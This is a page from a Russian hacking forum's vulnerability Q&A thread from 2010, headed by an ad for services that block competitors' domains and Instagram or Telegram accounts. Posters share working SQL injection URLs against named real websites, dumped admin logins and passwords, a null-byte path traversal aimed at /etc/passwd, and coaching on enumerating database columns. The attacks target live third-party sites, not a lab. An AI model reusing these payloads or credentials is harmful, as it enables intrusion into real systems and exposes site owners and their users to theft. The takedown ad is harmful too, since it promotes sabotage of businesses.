УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1166 из 1393

1166

Опции темы

Поиск в этой теме

Опции просмотра

#11651

20.02.2010, 02:55

shell_c0de

Reservists Of Antichat - Level 6

Регистрация: 07.07.2009

Сообщений: 324

Провел на форуме:
1585404

Репутация: 564

Отправить сообщение для shell_c0de с помощью ICQ

Отправить сообщение для shell_c0de с помощью AIM

Цитата:

Сообщение от Darren

Всем привет, хочу научиться скулю, ногами сильно не пинать
есть уязвимый сайт,
я подобрал колличество строк
http://zub.by/page.php?form_id=75%20union%20select%20+1,2,3,4,5% 20from%20pl_menu_page

http://zub.by/page.php?form_id=-75
Version 5.0.51a-24+lenny2+spu1
Database zubby
User zubby@localhost
OS debian-linux-gn
Tables cms_system_users
id 1
Name Администратор
Login admin
Password sa
смаотри еще таблицу pl_user_user
uname test
upassword test

#11652

20.02.2010, 06:25

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

реакция на знак равенства, переменная id не попадает в SQL запрос

Код:

http://topok.com.ua/services.php?id=22/**/and/**/(1,2)in(select/**/*/**/from(select/**/name_const(version(),1),name_const(version(),1))as/**/a)

__________________
Карфаген должен быть разрушен...

#11653

20.02.2010, 16:09

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ

Код:

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s):

#11654

20.02.2010, 17:14

$n@ke

Постоянный

Регистрация: 18.09.2006

Сообщений: 867

Провел на форуме:
2805813

Репутация: 1396

Нужна тулза, для работы со blind sql-inj, 5 ветка. причем чтоб работала по https и с куками)). пох на платформу.

зы:
Перловый гуй от Электа - под виндами требует ссл, который под актив перл не ставится изза ошибки - undef error. соответственно хз как фиксить))

Придется перечислить что пробовал:
sipt,toolza,elekt antichat mysql....
Тулза не поддерживает пока хттпс. Сипт вроде тож.

Последний раз редактировалось $n@ke; 20.02.2010 в 19:13..

#11655

20.02.2010, 17:48

Tigger

Познавший АНТИЧАТ

Регистрация: 27.08.2007

Сообщений: 1,107

Провел на форуме:
5386281

Репутация: 1177

Отправить сообщение для Tigger с помощью ICQ

Цитата:

Сообщение от warlok

а можно ли какнибудь обойти open_basedir при инклуде ? т.е. пытаюсь эксплуатировать багу а мне в ответ

Код:

Warning: file_exists() [function.file-exists]: open_basedir restriction in effect. File(view/w.my.../../../../../etc/passwd\0.php) is not within the allowed path(s):

Нет.

#11656

20.02.2010, 18:04

~~Darren~~

Banned

Регистрация: 14.06.2008

Сообщений: 34

Провел на форуме:
119183

Репутация: 13

Отправить сообщение для Darren с помощью ICQ

Такой вопрос, допустим я нашёл таблицу в которой содержатся логин и пасс админа

http://xxx/page.php?form_id=-75+union+select+1,2,3,4,5+from+cms_system_users+li mit+0,1--

Узнать название столбца содержащее логин админа можно только перебирая названия типа admin, user,users, login, password , т.е. только методом перебора напр. так:
http://xxx/page.php?form_id=-75+union+select+1,2,3,4,admin+from+cms_system_user s+limit+0,1--

http://xxx/page.php?form_id=-75+union+select+1,2,3,4,column_name+from cms_system_users+limit+0,1--
(так тоже не выходит)

или как можно узнать названия столбцов в существующей таблице?только перебором? в факах не понял смысла, help please

#11657

20.02.2010, 18:46

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

0x{hex table} а то не поймет)) hex - это строка в шестнадцатеричном виде)

#11658

20.02.2010, 18:48

[Feldmarschall]

Участник форума

Регистрация: 06.01.2010

Сообщений: 136

Провел на форуме:
568388

Репутация: 87

Цитата:

Сообщение от [x60]unu

ахаха
column_anme+information_Schema.columns+where+table _name={hex table}
или or 'table'

Прочитал статью бы хоть

column_name+from+information_schema.columns+limit+0,1--

#11659

20.02.2010, 18:53

Seravin

Участник форума

Регистрация: 25.11.2009

Сообщений: 201

Провел на форуме:
866555

Репутация: 226

Цитата:

Сообщение от [Feldmarschall]

column_name+from+information_schema.columns+limit+0,1--

Так ты будешь получать все столбцы, и ты не будешь знать из какой они таблицы

#11660

20.02.2010, 20:16

~~Darren~~

Banned

Регистрация: 14.06.2008

Сообщений: 34

Провел на форуме:
119183

Репутация: 13

Цитата:

Сообщение от Seravin

Так ты будешь получать все столбцы, и ты не будешь знать из какой они таблицы

Не ругаемся господа
Login admin
Password sa
Всем спасибо))

Страница 1166 из 1393

1166

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Форумы	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход